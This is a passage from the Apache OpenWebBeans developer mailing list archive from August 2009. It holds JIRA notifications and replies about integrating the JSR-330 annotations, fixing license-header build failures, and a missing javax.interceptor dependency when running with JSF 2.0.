JIRA. > - > You can reply to this email to add a comment to the issue online. > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c341ac4c4a20471a084d9-- From [email protected] Fri Aug 21 08:28:16 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19825 invoked from network); 21 Aug 2009 08:28:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Aug 2009 08:28:16 -0000 Received: (qmail 99351 invoked by uid 500); 21 Aug 2009 08:28:38 -0000 Delivered-To: [email protected] Received: (qmail 99335 invoked by uid 500); 21 Aug 2009 08:28:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99325 invoked by uid 99); 21 Aug 2009 08:28:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 08:28:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 08:28:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C3D53234C044 for <[email protected]>; Fri, 21 Aug 2009 01:28:14 -0700 (PDT) Message-ID: <1084285643.1250843294797.JavaMail.jira@brutus> Date: Fri, 21 Aug 2009 01:28:14 -0700 (PDT) From: "Sven Linstaedt (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (OWB-131) integrate new JSR-330 annotations within OWB In-Reply-To: <80121743.1250806874998.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-131?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12745851#action_12745851 ] Sven Linstaedt commented on OWB-131: ------------------------------------ Just to add some points: * @Inject will be mandatory for all injection points (fields, methods, non-default constructor, but not on parameters), even if they have no binding annotation * @Initializer is obsolote, will be replaced by @Inject on non-default constructors > integrate new JSR-330 annotations within OWB > -------------------------------------------- > > Key: OWB-131 > URL: https://issues.apache.org/jira/browse/OWB-131 > Project: OpenWebBeans > Issue Type: New Feature > Components: Core > Affects Versions: M2 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M3 > > > The JSR-330 annotations from the new spec are replacing functionality from a few now obsolete annotations: > @Current -> @Inject > @BindingType -> @Qualifier > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the 'normal' and 'passivating' attributes) This is now unclear btw... > @Singleton will be a new Scope -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Aug 21 08:46:11 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30689 invoked from network); 21 Aug 2009 08:46:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Aug 2009 08:46:11 -0000 Received: (qmail 27359 invoked by uid 500); 21 Aug 2009 08:46:33 -0000 Delivered-To: [email protected] Received: (qmail 27334 invoked by uid 500); 21 Aug 2009 08:46:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27324 invoked by uid 99); 21 Aug 2009 08:46:33 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 08:46:33 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27806.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 21 Aug 2009 08:46:22 +0000 Received: (qmail 35201 invoked by uid 60001); 21 Aug 2009 08:46:00 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1250844360; bh=IpSXr/bfOQES6MyX09NT+AWE8+XiLuordepYhh3DIwg=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=yvNg94cf8LcSh+QKMRkrZkV45dJUNVC01swukiqGpZ1DhrcNE6yNdXmaYEtDX/IGQXQ0/1f8VmDikLngKd7zw4jyu8IlWxvs3wLHb3ObG+wwQArNNnEIjaA7n7/WZwCEzPY+FDQu6MEHehu7E9ySNpz5sxPGW36NzJYm8SgCkfY= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=t3io4457QM/+5VLSqIg6b1Vuu+u69u8enqvcsHCNtm8fyDvxNTHRbMU3HFwKYuVYQBSze0M7f41o6dYbda791fT+noHrAleP8zYBoRc11Ln5m7ysf0/oLU4dfKxJCxcgWwdK9Ze08pJACWsbDS4ffdypDzgyiGQXoW4Xe40iTvc=; Message-ID: <[email protected]> X-YMail-OSG: 5J2llxwVM1mKXwzkw1I9LBGvzHjGYcD30H4pdp5vH.oq1NCV88imKboHuF0LOU0Qiuidabr5M8HBSEb5Vl6UTWRNuVdSHzM7rvJIFESQcOhzpUV0L_yzaP4Zel1rPMQC1WdlPS1X9lfS..mZsC5mOZuLO6mIaW5i0W3zK3dQeEyT0fnwWxSSysNru8zmO0hsOhQu6ZaxSAM7U97m0fd57c3TiQ9uBtloXJ_JrDFFMw928RJzJkRyulEGQgKSV_C5yMMKGkN68mvoB50QzIjp2bRh2mV_OCvlx17Hwpmxg7lYP_ziKrMo51KwgcDNC6nBhbRWziQtXqo9iRswEUDTchriZWcRTdH4Kjbc_StI Received: from [161.129.204.104] by web27806.mail.ukl.yahoo.com via HTTP; Fri, 21 Aug 2009 08:46:00 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 References: <80121743.1250806874998.JavaMail.jira@brutus> <[email protected]> Date: Fri, 21 Aug 2009 08:46:00 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: [jira] Created: (OWB-131) integrate new JSR-330 annotations within OWB To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org yes, I will wait for your commit. LieGrue, strub ----- Original Message ---- > From: Gurkan Erdogdu <[email protected]> > To: [email protected] > Sent: Friday, August 21, 2009 7:55:43 AM > Subject: Re: [jira] Created: (OWB-131) integrate new JSR-330 annotations within OWB > > Hey Mark; > > I have been lots of change because of Resource Handling. > > Please commit your changes after my check in. Otherwise we may get lots of > conflicts. I will try to check in my changes until tomorrow. > > Thanks; > > --Gurkan > > 2009/8/21 Mark Struberg (JIRA) > > > integrate new JSR-330 annotations within OWB > > -------------------------------------------- > > > > Key: OWB-131 > > URL: https://issues.apache.org/jira/browse/OWB-131 > > Project: OpenWebBeans > > Issue Type: New Feature > > Components: Core > > Affects Versions: M2 > > Reporter: Mark Struberg > > Assignee: Mark Struberg > > Fix For: M3 > > > > > > The JSR-330 annotations from the new spec are replacing functionality from > > a few now obsolete annotations: > > > > @Current -> @Inject > > @BindingType -> @Qualifier > > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the > > 'normal' and 'passivating' attributes) This is now unclear btw... > > @Singleton will be a new Scope > > > > -- > > This message is automatically generated by JIRA. > > - > > You can reply to this email to add a comment to the issue online. > > > > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com From [email protected] Fri Aug 21 15:08:16 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27106 invoked from network); 21 Aug 2009 15:08:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Aug 2009 15:08:16 -0000 Received: (qmail 46642 invoked by uid 500); 21 Aug 2009 15:08:39 -0000 Delivered-To: [email protected] Received: (qmail 46622 invoked by uid 500); 21 Aug 2009 15:08:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46612 invoked by uid 99); 21 Aug 2009 15:08:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 15:08:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 15:08:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CE3DC234C004 for <[email protected]>; Fri, 21 Aug 2009 08:08:14 -0700 (PDT) Message-ID: <964830895.1250867294829.JavaMail.jira@brutus> Date: Fri, 21 Aug 2009 08:08:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Reopened: (OWB-130) implement JSR-330 annotations for OWB In-Reply-To: <1965431788.1250806275005.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-130?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mark Struberg reopened OWB-130: ------------------------------- I need to apply a few more changes which I found on the atinject-observer mailing list and the atinject issues. > implement JSR-330 annotations for OWB > ------------------------------------- > > Key: OWB-130 > URL: https://issues.apache.org/jira/browse/OWB-130 > Project: OpenWebBeans > Issue Type: New Feature > Components: Core > Affects Versions: M3 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M3 > > > Since the latest spec from 2009-08-17, JSR-299 is depending on JSR-330. > We should reflect this fact by introducing a new package atinject-api and add it as dependency to webbeans-api -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Aug 21 15:24:16 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35279 invoked from network); 21 Aug 2009 15:24:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Aug 2009 15:24:16 -0000 Received: (qmail 93605 invoked by uid 500); 21 Aug 2009 15:24:38 -0000 Delivered-To: [email protected] Received: (qmail 93592 invoked by uid 500); 21 Aug 2009 15:24:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93578 invoked by uid 99); 21 Aug 2009 15:24:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 15:24:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 15:24:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E7EA3234C1F0 for <[email protected]>; Fri, 21 Aug 2009 08:24:14 -0700 (PDT) Message-ID: <837100875.1250868254949.JavaMail.jira@brutus> Date: Fri, 21 Aug 2009 08:24:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (OWB-130) implement JSR-330 annotations for OWB In-Reply-To: <1965431788.1250806275005.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-130?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mark Struberg resolved OWB-130. ------------------------------- Resolution: Fixed > implement JSR-330 annotations for OWB > ------------------------------------- > > Key: OWB-130 > URL: https://issues.apache.org/jira/browse/OWB-130 > Project: OpenWebBeans > Issue Type: New Feature > Components: Core > Affects Versions: M3 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M3 > > > Since the latest spec from 2009-08-17, JSR-299 is depending on JSR-330. > We should reflect this fact by introducing a new package atinject-api and add it as dependency to webbeans-api -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 22 07:26:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52668 invoked from network); 22 Aug 2009 07:26:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Aug 2009 07:26:17 -0000 Received: (qmail 61975 invoked by uid 500); 22 Aug 2009 07:26:39 -0000 Delivered-To: [email protected] Received: (qmail 61962 invoked by uid 500); 22 Aug 2009 07:26:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61952 invoked by uid 99); 22 Aug 2009 07:26:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 22 Aug 2009 07:26:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 22 Aug 2009 07:26:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E3D76234C004 for <[email protected]>; Sat, 22 Aug 2009 00:26:14 -0700 (PDT) Message-ID: <272837484.1250925974928.JavaMail.jira@brutus> Date: Sat, 22 Aug 2009 00:26:14 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-132) atinject license header formatting breaks build In-Reply-To: <219981658.1250908454798.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-132?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-132. ------------------------------ Resolution: Fixed Fix Version/s: M3 It has done. Thanks David. > atinject license header formatting breaks build > ----------------------------------------------- > > Key: OWB-132 > URL: https://issues.apache.org/jira/browse/OWB-132 > Project: OpenWebBeans > Issue Type: Bug > Reporter: David Blevins > Assignee: Gurkan Erdogdu > Fix For: M3 > > Attachments: OWB-132.txt > > > Some files are missing the header and some have the header but with formatting that doesn't allow it to be recognized as the ASL 2.0 buy the tooling. Build currently fails: > [INFO] ------------------------------------------------------------------------ > [ERROR] BUILD FAILURE > [INFO] ------------------------------------------------------------------------ > [INFO] Too many unapproved licenses: 6 > [INFO] ------------------------------------------------------------------------ > [INFO] For more information, run Maven with the -e switch > [INFO] ------------------------------------------------------------------------ > [INFO] Total time: 12 seconds > [INFO] Finished at: Fri Aug 21 18:52:13 PDT 2009 > [INFO] Final Memory: 41M/87M > [INFO] ------------------------------------------------------------------------ > Attaching a patch. Also added a the extra warning that Geronimo puts on all its spec source so people know not to edit them. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 22 08:09:14 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60407 invoked from network); 22 Aug 2009 08:09:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Aug 2009 08:09:14 -0000 Received: (qmail 77468 invoked by uid 500); 22 Aug 2009 08:09:36 -0000 Delivered-To: [email protected] Received: (qmail 77438 invoked by uid 500); 22 Aug 2009 08:09:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77428 invoked by uid 99); 22 Aug 2009 08:09:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 22 Aug 2009 08:09:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 22 Aug 2009 08:09:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C368F234C004 for <[email protected]>; Sat, 22 Aug 2009 01:09:14 -0700 (PDT) Message-ID: <354246701.1250928554785.JavaMail.jira@brutus> Date: Sat, 22 Aug 2009 01:09:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (OWB-132) atinject license header formatting breaks build In-Reply-To: <219981658.1250908454798.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-132?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12746427#action_12746427 ] Mark Struberg commented on OWB-132: ----------------------------------- one short comment: Thanks for checking David! We now took the ASL header I know from maven, openjpa and myfaces. Our old was the same from the wording, but I must have ripped up the formatting with some reformat in Eclipse *blush* I only use /* instead of /** because I like to additionally comment the interfaces in the near future. But I don't like to simply copy it over from the JSR because of copyright issues. We also added a separate LICENSE.txt and NOTICE.txt. Can you please check if the NOTICE is correct? I wrote all the code myself, so do we need to reference the JSR-330 EG in it? rat:check now succeeds without any warning at least :) > atinject license header formatting breaks build > ----------------------------------------------- > > Key: OWB-132 > URL: https://issues.apache.org/jira/browse/OWB-132 > Project: OpenWebBeans > Issue Type: Bug > Reporter: David Blevins > Assignee: Gurkan Erdogdu > Fix For: M3 > > Attachments: OWB-132.txt > > > Some files are missing the header and some have the header but with formatting that doesn't allow it to be recognized as the ASL 2.0 buy the tooling. Build currently fails: > [INFO] ------------------------------------------------------------------------ > [ERROR] BUILD FAILURE > [INFO] ------------------------------------------------------------------------ > [INFO] Too many unapproved licenses: 6 > [INFO] ------------------------------------------------------------------------ > [INFO] For more information, run Maven with the -e switch > [INFO] ------------------------------------------------------------------------ > [INFO] Total time: 12 seconds > [INFO] Finished at: Fri Aug 21 18:52:13 PDT 2009 > [INFO] Final Memory: 41M/87M > [INFO] ------------------------------------------------------------------------ > Attaching a patch. Also added a the extra warning that Geronimo puts on all its spec source so people know not to edit them. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Aug 26 08:36:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86290 invoked from network); 26 Aug 2009 08:36:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 08:36:23 -0000 Received: (qmail 9679 invoked by uid 500); 26 Aug 2009 08:36:23 -0000 Delivered-To: [email protected] Received: (qmail 9649 invoked by uid 500); 26 Aug 2009 08:36:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9639 invoked by uid 99); 26 Aug 2009 08:36:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 08:36:23 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 08:36:11 +0000 Received: by ewy4 with SMTP id 4so4119090ewy.27 for <[email protected]>; Wed, 26 Aug 2009 01:35:51 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:date :x-google-sender-auth:message-id:subject:from:to:content-type; bh=PFbHB+nTTgZLM0Lk2YL4z/sIU5eWtxvY/8bI/4X/RE0=; b=agq1iTACATsAi/mmkCF+tMCorNo/N4Hi8U0uVJHST/Mx/kgkTN6TPQDH/oWLbM/s/S QltyZENLXL6+0lKucLpJhyysEfASzNes8kyHcVVkAAdT9srzCMoqbWmaBNmLVPiyy/ba y8YIWAdjhS1P4mg2lCLtB8NRGWi4aj1c6kS9k= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:date:x-google-sender-auth:message-id:subject :from:to:content-type; b=rWX/eD0Ps8g0xxF8ItlmD0HpqkKYGtLeArBAEI8vfJhXlEcmMA/+OsTTjtwMvYTHcb Hc1fd5nf9eDEIpVtlrtejr27jlvyPk9lmXmO56FjKiRkGeFaVmfA0eHs/msQGi47xQVJ oEkkXcsStP+llA9jD3SxA7fcSun9KCNEa9cyo= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id b17mr3798251ebd.86.1251275751346; Wed, 26 Aug 2009 01:35:51 -0700 (PDT) Date: Wed, 26 Aug 2009 10:35:51 +0200 X-Google-Sender-Auth: 10b7e5088b9eff7e Message-ID: <[email protected]> Subject: java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org Hi, running TRUNK and JSF 2.0, I am getting this when accessing a XHTML page: java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke at org.apache.webbeans.intercept.InterceptorUtil.isWebBeansBusinessMethod(InterceptorUtil.java:60) at org.apache.webbeans.intercept.InterceptorHandler.invoke(InterceptorHandler.java:68) at org.apache.webbeans.conversation.ConversationImpl_$$_javassist_0.updateTimeOut(ConversationImpl_$$_javassist_0.java) at org.apache.webbeans.jsf.WebBeansPhaseListener.beforePhase(WebBeansPhaseListener.java:167) at com.sun.faces.lifecycle.Phase.handleBeforePhase(Phase.java:212) at com.sun.faces.lifecycle.Phase.doPhase(Phase.java:100) at com.sun.faces.lifecycle.LifecycleImpl.render(LifecycleImpl.java:139) at javax.faces.webapp.FacesServlet.service(FacesServlet.java:311) this was working in June - Question is why is there no dependency bundled ? -Matthias -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 09:42:44 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10570 invoked from network); 26 Aug 2009 09:42:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 09:42:44 -0000 Received: (qmail 97379 invoked by uid 500); 26 Aug 2009 09:42:44 -0000 Delivered-To: [email protected] Received: (qmail 97360 invoked by uid 500); 26 Aug 2009 09:42:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97350 invoked by uid 99); 26 Aug 2009 09:42:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 09:42:44 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web38201.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 26 Aug 2009 09:42:31 +0000 Received: (qmail 57460 invoked by uid 60001); 26 Aug 2009 09:42:09 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1251279729; bh=Ndmr1nES7xgDORCV2h6fDiSm/c1Vczs36onfEdz3TiA=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=G7s/j1dx8U9VqHGTo/6ZcGL4WEKzC4VlPq75wMz22FuE14r9/szSzMlzDvNJYA5noEULWWYlmexfxB6rIGF0ajOWiX+hjGgypWfFn7gizgP7YhdMErJ3rPMu1VY9uGOSpYKvpGYNJ7/hAfzSnRfTdQVlgzlaqLUTOPA3i4U2yJk= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=OvavqCAPgzCzfflhieLgoux3SkKFRaHI5Ncge9UgguwgSlS7LVWGRAI0KQqsonfJaLMIHUX5PsoJD7LYKuiprkeTUqs6AZ862V9TNhgZlz8nO0BBo/bXXC1zAH/WAO77vPrC3ptHiRhmviSj1uMP2DosUyabhwYMzUZ2abH6Ai4=; Message-ID: <[email protected]> X-YMail-OSG: CnFsJewVM1mTT9K1efCTyztm7Bk_Jr.hByn9rgVpQc_cn_KxJtnSNYHKDvtE..IIvfGVxLwQfwEBsFW5U.4bQlGddcKNMaca9mjOuGjQ7QIlkhy.T.hDaMZwO4Y5cvY940VwozqIEqhUuqAdeDglo4REqgvnPRtCLeMCsQTySxxzwQSgSpGhH9gUIaJff8x0Q_fwtVUGZTsXhPlKZoYkOfSbaL0nOjTraQWlEUNJhuWuL_58Ylnb3T0bveViaYS2TNJw73scWtZNLGHMizlErrs3eYnZ3yQuk.aMBUPAa5Ew8RwUosoP7RK_gWizgIn9MhioBnE2SjD8FZq7WA_Rjxptqs68CZmZkI52BsdrVgWD2ZBcivsNbqcv5s0VJMpqFxvq7fAOR1n7gW7MjgFQpgSg45Bj9EXuFPgr Received: from [161.129.204.104] by web38201.mail.mud.yahoo.com via HTTP; Wed, 26 Aug 2009 02:42:09 PDT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 References: <[email protected]> Date: Wed, 26 Aug 2009 02:42:09 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1396049640-1251279729=:56713" X-Virus-Checked: Checked by ClamAV on apache.org --0-1396049640-1251279729=:56713 Content-Type: text/plain; charset=us-ascii Hi Matthias; We bundle jar via Jetty profile becuase of other Java EE servers contains this jar. So you can run samples via -Pjetty like this mvn jetty:run -Pjetty Hope,this works. Thanks; ________________________________ From: Matthias Wessendorf <[email protected]> To: [email protected] Sent: Wednesday, August 26, 2009 11:35:51 AM Subject: java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke Hi, running TRUNK and JSF 2.0, I am getting this when accessing a XHTML page: java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke at org.apache.webbeans.intercept.InterceptorUtil.isWebBeansBusinessMethod(InterceptorUtil.java:60) at org.apache.webbeans.intercept.InterceptorHandler.invoke(InterceptorHandler.java:68) at org.apache.webbeans.conversation.ConversationImpl_$$_javassist_0.updateTimeOut(ConversationImpl_$$_javassist_0.java) at org.apache.webbeans.jsf.WebBeansPhaseListener.beforePhase(WebBeansPhaseListener.java:167) at com.sun.faces.lifecycle.Phase.handleBeforePhase(Phase.java:212) at com.sun.faces.lifecycle.Phase.doPhase(Phase.java:100) at com.sun.faces.lifecycle.LifecycleImpl.render(LifecycleImpl.java:139) at 